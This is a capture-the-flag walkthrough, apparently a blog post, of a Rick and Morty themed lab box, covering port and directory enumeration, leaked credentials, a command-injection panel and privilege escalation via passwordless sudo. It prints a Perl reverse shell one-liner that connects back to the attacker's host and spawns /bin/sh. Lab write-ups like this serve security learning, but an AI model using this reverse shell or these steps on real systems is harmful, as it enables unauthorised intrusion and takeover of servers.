A Rick and Morty CTF. Help turn Rick back into a human! Link to room is here
![](https://miro.medium.com/max/696/1*Lvo5T_2AnmYVzXfm6vacZg.jpeg)
This is Rick and Morty themed challenge,we are Morty in this challenge. We have to exploit a web server to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.Let’s use our hacking super power and hack the web server and save Rick.
Launch the box and let’s enumerate the IP given.
Use: nmap -sC -sV -A machine IP
- nmap is network mapper tool
- -sC -> default script scanning
- -sV -> version detection
![](http://blog.ehackify.com/media/2021/06/Screenshot_2-3.png)
We can see that the ports 22 and 80 are open.Port 22 is for SSH(secure shell ) and port 80 for HTTP. Lets go to the the browser and paste the IP there and check what is waiting for us.
![](http://blog.ehackify.com/media/2021/06/Screenshot_4-1-1024x470.png)
Let’s spend some time to enumerate this website.Let’s view the source code in that time.
![](http://blog.ehackify.com/media/2021/06/Screenshot_5-2-1024x437.png)
A user name is found here. let’s do directory enumeration and check other directories also.
Use: gobuster dir -u machine_ip -w wordlist_path
- gobuster -> tool
- dir-> directory enumeration mode
- -w ->specify wordlist path
![](http://blog.ehackify.com/media/2021/06/Screenshot_6-2.png)
The results says there are many directories.Let’s open one by one.( I forgot to take screenshot)
- /login.php
- /robots.txt
- /assests
![](http://blog.ehackify.com/media/2021/06/Screenshot_7-1.png)
![](http://blog.ehackify.com/media/2021/06/Screenshot_8-1.png)
Here I think we got a password.Let’s try the password and user name that we have in our hand now.
![](http://blog.ehackify.com/media/2021/06/Screenshot_10-3.png)
I viewed the source code of this logged in page and found something interesting.
![](http://blog.ehackify.com/media/2021/06/Screenshot_30.png)
I guess we have a base64 encrypted password. Let’s go to CyberChef to crack it.
![](http://blog.ehackify.com/media/2021/06/Screenshot_11-1.png)
I had to do the decryption almost 9 times to understand it was a rabbit hole,But that’s Ok. Keep moving forward we need to save Rick.
Let’s check the logged in page.
Wait that’s strange! why is it showing a command panel here? Let’s execute some basic commands ans see.
![](http://blog.ehackify.com/media/2021/06/Screenshot_12-1.png)
This page has command execution vulnerability, Let’s try some more commands.
![](http://blog.ehackify.com/media/2021/06/Screenshot_14-1.png)
![](http://blog.ehackify.com/media/2021/06/Screenshot_13-1.png)
Seems like our commands are sanitized.Which means our code will not be executed it will be just evaporate before it reaches the server.
Got another idea. We shall take a reverse shell from here.I used a Perl reverse shell code.
use:perl -e ‘use Socket;$i=”IP”;$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
Listen to the port set.
![](http://blog.ehackify.com/media/2021/06/Screenshot_19-1.png)
Execute the command in the website and get the shell as shown below.
![](http://blog.ehackify.com/media/2021/06/Screenshot_21-1.png)
Now let’s execute some codes in the /var/www/html directory.
![](http://blog.ehackify.com/media/2021/06/Screenshot_24.png)
Now let’s move around through the server and find other two more secret ingredients.Let’s go to the /home directory and search.
![](http://blog.ehackify.com/media/2021/06/Screenshot_25-1.png)
We are one step away from saving Rick.
Use: sudo -l
![](http://blog.ehackify.com/media/2021/06/Screenshot_26.png)
We found something very interesting that we can run everything in sudo without a password.
Time for privilege escalation.
use: sudo su
![](http://blog.ehackify.com/media/2021/06/Screenshot_27.png)
We finally saved Rick.
Summary
- Basic enumeration done- port 22,port 80 open.
- We did directory enumeration on website.
- Website had command execution vulnerability.
- We took a reverse shell using perl code.
- We could switch user without password.
- We did sudo su to switch user and captured flags.
Thank you, peace out ✌️.
Leave a Reply